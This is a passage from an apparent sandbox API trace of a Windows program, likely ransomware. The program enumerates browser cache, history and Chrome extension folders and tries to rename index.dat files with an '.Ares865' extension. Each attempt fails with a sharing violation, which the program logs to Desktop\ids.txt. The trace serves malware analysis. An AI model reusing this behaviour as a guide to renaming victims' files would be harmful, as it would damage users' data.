Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg" [0111.469] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar" [0111.500] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 115 [0111.500] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.500] GetLastError () returned 0x20 [0111.500] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 137 [0111.500] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 137 [0111.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.502] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7833 [0111.502] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x89, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x89, lpOverlapped=0x0) returned 1 [0111.503] CloseHandle (hObject=0x118) returned 1 [0111.503] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.503] CloseHandle (hObject=0x0) returned 0 [0111.503] CloseHandle (hObject=0x0) returned 0 [0111.503] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0111.516] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 98 [0111.516] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.516] GetLastError () returned 0x20 [0111.516] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 120 [0111.516] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 120 [0111.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.517] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x78bc [0111.517] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x78, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x78, lpOverlapped=0x0) returned 1 [0111.518] CloseHandle (hObject=0x118) returned 1 [0111.518] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.518] CloseHandle (hObject=0x0) returned 0 [0111.518] CloseHandle (hObject=0x0) returned 0 [0111.518] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0111.518] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 123 [0111.518] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.518] GetLastError () returned 0x20 [0111.518] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 145 [0111.518] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 145 [0111.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.519] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7934 [0111.519] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x91, lpOverlapped=0x0) returned 1 [0111.520] CloseHandle (hObject=0x118) returned 1 [0111.520] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.520] CloseHandle (hObject=0x0) returned 0 [0111.520] CloseHandle (hObject=0x0) returned 0 [0111.520] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0111.520] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0111.520] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0111.585] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 132 [0111.585] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.585] GetLastError () returned 0x20 [0111.585] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 154 [0111.585] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 154 [0111.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.586] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x79c5 [0111.586] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x9a, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x9a, lpOverlapped=0x0) returned 1 [0111.587] CloseHandle (hObject=0x118) returned 1 [0111.587] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.587] CloseHandle (hObject=0x0) returned 0 [0111.587] CloseHandle (hObject=0x0) returned 0 [0111.587] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0111.601] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 115 [0111.601] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.601] GetLastError () returned 0x20 [0111.601] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 137 [0111.601] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 137 [0111.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.602] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7a5f [0111.602] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x89, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x89, lpOverlapped=0x0) returned 1 [0111.603] CloseHandle (hObject=0x118) returned 1 [0111.603] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.603] CloseHandle (hObject=0x0) returned 0 [0111.603] CloseHandle (hObject=0x0) returned 0 [0111.603] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0111.603] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 140 [0111.604] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.604] GetLastError () returned 0x20 [0111.604] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 162 [0111.604] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 162 [0111.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.604] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae8 [0111.604] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xa2, lpOverlapped=0x0) returned 1 [0111.605] CloseHandle (hObject=0x118) returned 1 [0111.605] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.605] CloseHandle (hObject=0x0) returned 0 [0111.605] CloseHandle (hObject=0x0) returned 0 [0111.605] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0111.605] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0111.605] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0111.681] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 149 [0111.681] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.681] GetLastError () returned 0x20 [0111.681] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 171 [0111.682] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 171 [0111.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.683] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7b8a [0111.683] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xab, lpOverlapped=0x0) returned 1 [0111.684] CloseHandle (hObject=0x118) returned 1 [0111.684] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.684] CloseHandle (hObject=0x0) returned 0 [0111.684] CloseHandle (hObject=0x0) returned 0 [0111.684] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0111.703] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 132 [0111.703] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.703] GetLastError () returned 0x20 [0111.703] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 154 [0111.704] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 154 [0111.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.704] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7c35 [0111.705] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x9a, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x9a, lpOverlapped=0x0) returned 1 [0111.705] CloseHandle (hObject=0x118) returned 1 [0111.705] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0111.705] CloseHandle (hObject=0x0) returned 0 [0111.705] CloseHandle (hObject=0x0) returned 0 [0111.706] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0111.706] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 157 [0111.706] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0111.706] GetLastError () returned 0x20 [0111.706] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 179 [0111.706] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 179 [0111.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0111.707] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) 